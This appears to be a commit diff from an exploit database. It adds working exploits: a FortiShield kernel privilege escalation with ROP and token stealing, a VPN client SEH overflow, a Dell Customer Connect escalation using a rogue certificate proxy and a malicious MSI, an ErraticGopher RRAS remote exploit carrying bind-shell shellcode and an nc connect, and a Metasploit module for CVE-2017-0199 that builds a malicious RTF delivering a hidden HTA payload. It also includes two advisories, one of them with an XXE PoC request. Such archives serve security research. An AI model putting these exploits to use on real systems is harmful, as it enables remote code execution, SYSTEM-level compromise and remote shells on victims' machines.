memcpy(shellcode + 0xf7e1, &rop_05, 0x08);
memcpy(shellcode + 0xf7e9, &rop_06, 0x08);
memcpy(shellcode + 0xf871, &rop_07, 0x08);
memcpy(shellcode + 0xf879, &rop_08, 0x08);
memcpy(shellcode + 0xf826, &rop_01, 0x08);
memcpy(shellcode + 0xf82e, &rop_02, 0x08);
memcpy(shellcode + 0xf836, &rop_03, 0x08);
memcpy(shellcode + 0xf83e, &rop_04, 0x08);
memcpy(shellcode + 0xf846, &rop_05, 0x08);
memcpy(shellcode + 0xf84e, &rop_06, 0x08);
memcpy(shellcode + 0xf8d6, &rop_07, 0x08);
memcpy(shellcode + 0xf8de, &rop_08, 0x08);
memcpy(shellcode + 0x10040, token_steal, sizeof(token_steal));
BOOL WPMresult;
@ -452,7 +452,7 @@ int main() {
printf("[+] Manager BitMap pvScan0 offset: %I64x\n", (ULONGLONG)manager_pvScan_offset);
printf("[+] Worker BitMap pvScan0 offset: %I64x\n", (ULONGLONG)worker_pvScan_offset);
HANDLE forti;
forti = CreateFile((LPCSTR)"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (forti == INVALID_HANDLE_VALUE) {
@ -462,7 +462,7 @@ int main() {
LPVOID kernel_base = GetBaseAddr("ntoskrnl.exe");
LPVOID fortishield_base = GetBaseAddr("FortiShield.sys");
ULONGLONG kernel_pivot = (ULONGLONG)kernel_base + 0x1468b0;
ULONGLONG kernel_pivot = (ULONGLONG)kernel_base + 0x4efae5;
ULONGLONG fortishield_callback = (ULONGLONG)fortishield_base + 0xd150;
ULONGLONG fortishield_restore = (ULONGLONG)fortishield_base + 0x2f73;
printf("[+] Kernel found at: %llx\n", (ULONGLONG)kernel_base);
@ -495,22 +495,32 @@ int main() {
return 1;
}
printf("[+] Press ENTER to trigger the vulnerability.\n");
getchar();
BOOL triggerIOCTL;
ResumeThread(hThread);
triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
WaitForSingleObject(hThread, INFINITE);
/* <Reading the PTE base virtual address from nt!MiGetPteAddress + 0x13> */
ULONGLONG manager_write_pte_offset = (ULONGLONG)kernel_base + 0x9c957;
ULONGLONG manager_write_pte_offset = (ULONGLONG)kernel_base + 0x47314 + 0x13;
printf("[+] Writing nt!MiGetPteAddress + 0x13 to Worker pvScan0.\n");
getchar();
write_bitmap(bitmaps.manager_bitmap, manager_write_pte_offset);
printf("[+] Reading from Worker pvScan0.\n");
getchar();
ULONGLONG pte_start = read_bitmap(bitmaps.worker_bitmap);
printf("[+] PTE virtual base address: %I64x\n", pte_start);
ULONGLONG pte_result;
ULONGLONG pte_value = 0x49000000;
ULONGLONG pte_value = 0x8b000000;
pte_result = get_pxe_address_64(pte_value, pte_start);
printf("[+] PTE virtual address for 0x49000000: %I64x\n", pte_result);
printf("[+] PTE virtual address for 0x8b000000: %I64x\n", pte_result);
/* </Reading the PTE base virtual address from nt!MiGetPteAddress + 0x13> */
BOOL VFresult;
@ -538,6 +548,9 @@ int main() {
return 1;
}
printf("[+] Press ENTER to trigger the vulnerability again.\n");
getchar();
ResumeThread(hThread);
triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
WaitForSingleObject(hThread, INFINITE);

0
platforms/windows/local/41908.txt → platforms/win_x86-64/local/41908.txt
View file

22
platforms/windows/dos/41916.py Executable file
View file

@ -0,0 +1,22 @@
#!/usr/bin/python
# Exploit Title : Private Tunnel VPN Client 2.8 - Local Buffer Overflow (SEH)
# Date : 25/04/2017
# Exploit Author : Muhann4d
# Vendor Homepage : https://www.privatetunnel.com
# Software Link : https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
# Affected Versions : 2.8 & 2.7
# Category : Denial of Service (DoS) Local
# Tested on OS : Windows 7 SP1 32bit 64bit
# Proof of Concept : run the exploit, copy the contents of poc.txt, paste it in the password field and press Login.
junkA = "\x41" * 1996
nSEH = "\x42" * 4
SEH = "\x43" * 4
junkD = "\x44" * 9000
f = open ("poc.txt", "w")
f.write(junkA + nSEH + SEH + junkD)
f.close()

164
platforms/windows/local/41917.py Executable file
View file

@ -0,0 +1,164 @@
# Exploit Dell Customer Connect 1.3.28.0 Privilege Escalation
# Date: 25.04.2017
# Software Link: http://www.dell.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
1. Description
DCCService.exe is running on autostart as System.
This service has auto update functionality.
Basically it periodically checks https://otbs.azurewebsites.net looking for new config file.
Under normal conditions we cannot spoof this connection because its SSL.
But here WebUtils.sendWebRequest() is executed using Impersonator.RunImpersonated().
RunImpersonated() executes given function in the context of currently logged in user.
In Windows system we can add any certificate to Local user root store.
Then this certificate is considered as trusted so we can perform MITM attack.
It can be done using simple proxy server because by default .NET HttpWebRequest() uses IE proxy settings (which can by set by any user without administrator priveleges).
https://security.szurek.pl/dell-customer-connect-13280-privilege-escalation.html
2. Proof of Concept
from _winreg import *
from threading import Thread
import os
import subprocess
import hashlib
import SimpleHTTPServer
import SocketServer
import ssl
import httplib
import time
msi_file = "exploit.msi"
cert_file = "otbs.crt"
signing_file = "code.cer"
file_port = 5555
proxy_port = 7777
print "Dell Customer Connect 1.3.28.0 Privilege Escalation"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
# Simpe SSL proxy based on https://code.google.com/archive/p/proxpy/
class ProxyHandler(SocketServer.StreamRequestHandler):
def __init__(self, request, client_address, server):
SocketServer.StreamRequestHandler.__init__(self, request, client_address, server)
def handle(self):
global xml
line = self.rfile.readline()
for l in self.rfile:
if l == "\r\n":
break
if "GET /api/AppConfig" in line:
conn = httplib.HTTPSConnection(self.host, self.port)
print "\n[+] Send XML to service"
self.wfile.write("HTTP/1.1 200 200\r\n\r\n"+xml)
elif "CONNECT otbs.azurewebsites.net:443" in line:
socket_ssl = ssl.wrap_socket(self.request, server_side = True, certfile = cert_file, ssl_version = ssl.PROTOCOL_SSLv23, do_handshake_on_connect = False)
self.request.send("HTTP/1.1 200 Connection Established\r\n\r\n")
host, port = self.request.getpeername()
self.host = host
self.port = port
while True:
try:
socket_ssl.do_handshake()
break
except (ssl.SSLError, IOError):
return
print "\n[+] SSL Established with otbs.azurewebsites.net"
self.request = socket_ssl
self.setup()
self.handle()
class ThreadedHTTPProxyServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
def add_to_store(name, file):
output = subprocess.Popen('certutil -user -addstore "Root" "{}"'.format(file), stdout=subprocess.PIPE).communicate()[0]
if "\"{}\" already in store".format(name) in output:
print "[+] Certificate {} already in store".format(name)
elif "\"{}\" added to store".format(name) in output:
print "[+] Add certificate {} to user root store".format(name)
else:
print "[-] You need to click OK in order to add cert to user root store"
os._exit(0)
if not os.path.isfile(cert_file):
print "[-] Missing SSL file"
os._exit(0)
if not os.path.isfile(signing_file):
print "[-] Missing code signing file"
os._exit(0)
add_to_store("otbs.azurewebsites.net", cert_file)
add_to_store("dell inc", signing_file)
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def file_server():
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", file_port), Handler)
httpd.serve_forever()
if not os.path.isfile(msi_file):
print "[-] Missing msi file"
os._exit(0)
sha256 = sha256_checksum(msi_file)
print "[+] MSI hash: {}".format(sha256)
print "[+] Set Proxy Server in registry"
key = OpenKey(HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Internet Settings', 0, KEY_ALL_ACCESS)
SetValueEx(key, "ProxyServer", 0, REG_SZ, "127.0.0.1:{}".format(proxy_port))
SetValueEx(key, "ProxyEnable", 0, REG_DWORD, 1)
CloseKey(key)
print "[+] Start file server on port {}".format(file_port)
t1 = Thread(target = file_server)
t1.daemon = True
t1.start()
xml = "<UpdateResponse xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><LatestVersion>9.0.0.6</LatestVersion><UpgradeUrl>http://localhost:{}/{}</UpgradeUrl><UpgradeHash>{}</UpgradeHash><SurveyCheckInterval>1</SurveyCheckInterval></UpdateResponse>".format(file_port, msi_file, sha256)
print "[+] Start proxy server on port {}".format(proxy_port)
proxy_server = ThreadedHTTPProxyServer(("127.0.0.1", proxy_port), ProxyHandler)
t2 = Thread(target = proxy_server.serve_forever)
t2.daemon = True
t2.start()
log_path = r"C:\Users\All Users\Dell\Dell Customer Connect\Logs\{}_install_log.txt".format(msi_file)
print "[+] Waiting for execution ",
while True:
if os.path.isfile(log_path):
print "\n[+] Looks like msi file was executed, exiting"
os._exit(0)
time.sleep(3)
print ".",
3. Fix
http://www.dell.com/support/home/us/en/19/Drivers/DriversDetails?driverId=DR53F

31
platforms/windows/local/41933.txt Executable file
View file

@ -0,0 +1,31 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075
Windows: Dolby Audio X2 Service Elevation of Privilege
Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
Class: Elevation of Privilege
Summary:
The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.
Description:
The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. Theres public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.
Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.
Proof of Concept:
To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.
1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad”
2) Check the currently running processes for the privileged copy of notepad,
Expected Result:
No privilege escalation occurs.
Observed Result:
An instance of notepad is running at system privileges.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41933.zip

99
platforms/windows/remote/41929.py Executable file
View file

@ -0,0 +1,99 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##################################################################################
# By Victor Portal (vportal) for educational porpouse only
##################################################################################
# This exploit is the python version of the ErraticGopher exploit probably #
# with some modifications. ErraticGopher exploits a memory corruption #
# (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. #
# Because the Magic bytes, the application redirects the execution to the #
# iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy #
# all te injected stub from the heap to the stack, overwritten a return #
# address as well as the SEH handler stored in the Stack, being possible #
# to control the execution flow to disable DEP and jump to the shellcode #
# as SYSTEM user. #
##################################################################################
#The exploit only works if target has the RRAS service enabled
#Tested on Windows Server 2003 SP2
import struct
import sys
import time
import os
from threading import Thread
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
target = sys.argv[1]
print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
#RRAS DCE-RPC CALL
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
#NX disable routine for Windows Server 2003 SP2
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
rop += "\x45"*16
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
rop += "\x5d\x7a\x81\x7c" #ret 20
rop += "\x71\x42\x38\x77" #jmp esp
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
rop += "\x90"*2 + egghunter + "\x90"*42
rop += "\x17\xf5\x83\x7c" #Disable NX routine
rop += "\x90"*4
stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
stub += "\x12" #Magic byte
stub += "\x46"*522
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes
dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function)
print "[-]Exploit sent to target successfully..."
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")

159
platforms/windows/remote/41934.rb Executable file
View file

@ -0,0 +1,159 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec',
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-0199'],
['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
uri.delete!("\\")
padding_length = uri_maxlength * 2 - uri.length
fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
padding_length.times { uri << "0" }
uri
end
def create_ole_ministream_data
# require 'rex/ole'
# ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
# ministream = ole.instance_variable_get(:@ministream)
# ministream_data = ministream.instance_variable_get(:@data)
ministream_data = ""
ministream_data << "01000002090000000100000000000000" # 00000000: ................
ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
ministream_data << generate_uri
ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
ministream_data << "00000000000000000000000000000000" # 000000f0: ................
ministream_data << "100203000d0000000000000000000000" # 00000100: ................
ministream_data << "00000000000000000000000000000000" # 00000110: ................
ministream_data << "00000000000000000000000000000000" # 00000120: ................
ministream_data << "00000000000000000000000000000000" # 00000130: ................
ministream_data << "00000000000000000000000000000000" # 00000140: ................
ministream_data << "00000000000000000000000000000000" # 00000150: ................
ministream_data << "00000000000000000000000000000000" # 00000160: ................
ministream_data << "00000000000000000000000000000000" # 00000170: ................
ministream_data << "00000000000000000000000000000000" # 00000180: ................
ministream_data << "00000000000000000000000000000000" # 00000190: ................
ministream_data << "00000000000000000000000000000000" # 000001a0: ................
ministream_data << "00000000000000000000000000000000" # 000001b0: ................
ministream_data << "00000000000000000000000000000000" # 000001c0: ................
ministream_data << "00000000000000000000000000000000" # 000001d0: ................
ministream_data << "00000000000000000000000000000000" # 000001e0: ................
ministream_data << "00000000000000000000000000000000" # 000001f0: ................
ministream_data
end
def create_rtf_format
template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
template_rtf = ::File.open(template_path, 'rb')
data = template_rtf.read(template_rtf.stat.size)
data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
template_rtf.close
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end

143
platforms/xml/webapps/41925.txt Executable file
View file

@ -0,0 +1,143 @@
Application: Oracle PeopleSoft
Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55
Vendor URL: http://oracle.com
Bug: XXE
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Nadya Krivdyuk (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-020] XXE VIA DOCTYPE in PeopleSoft
PeopleSoftServiceListeningConnector
Advisory ID: [ERPSCAN-17-020]
Risk: high
CVE: CVE-2017-3548
Advisory URL: https://erpscan.com/advisories/erpscan-17-020-xxe-via-doctype-peoplesoft/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XXE
Impact: File disclosure, network discovery
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
A malicious user can modify an XML-based request to include XML
content that is then parsed locally.
4. VULNERABLE PACKAGES
PeopleSoft HCM 9.2 on PeopleTools 8.55
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Nadya Krivdyuk
7. TECHNICAL DESCRIPTION
An attacker can use an XML external entity vulnerability to send
specially crafted unauthorized XML requests, which will be processed
by the XML parser. The attacker can use an XML external entity
vulnerability for getting unauthorised access to the OS file system.
PoC
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: 172.16.2.91:8000
Content-type: text/xml
<!DOCTYPE a PUBLIC "-//B/A/EN" "C:\windows">
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
Emerging Vendor in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScans primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We follow the sun and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security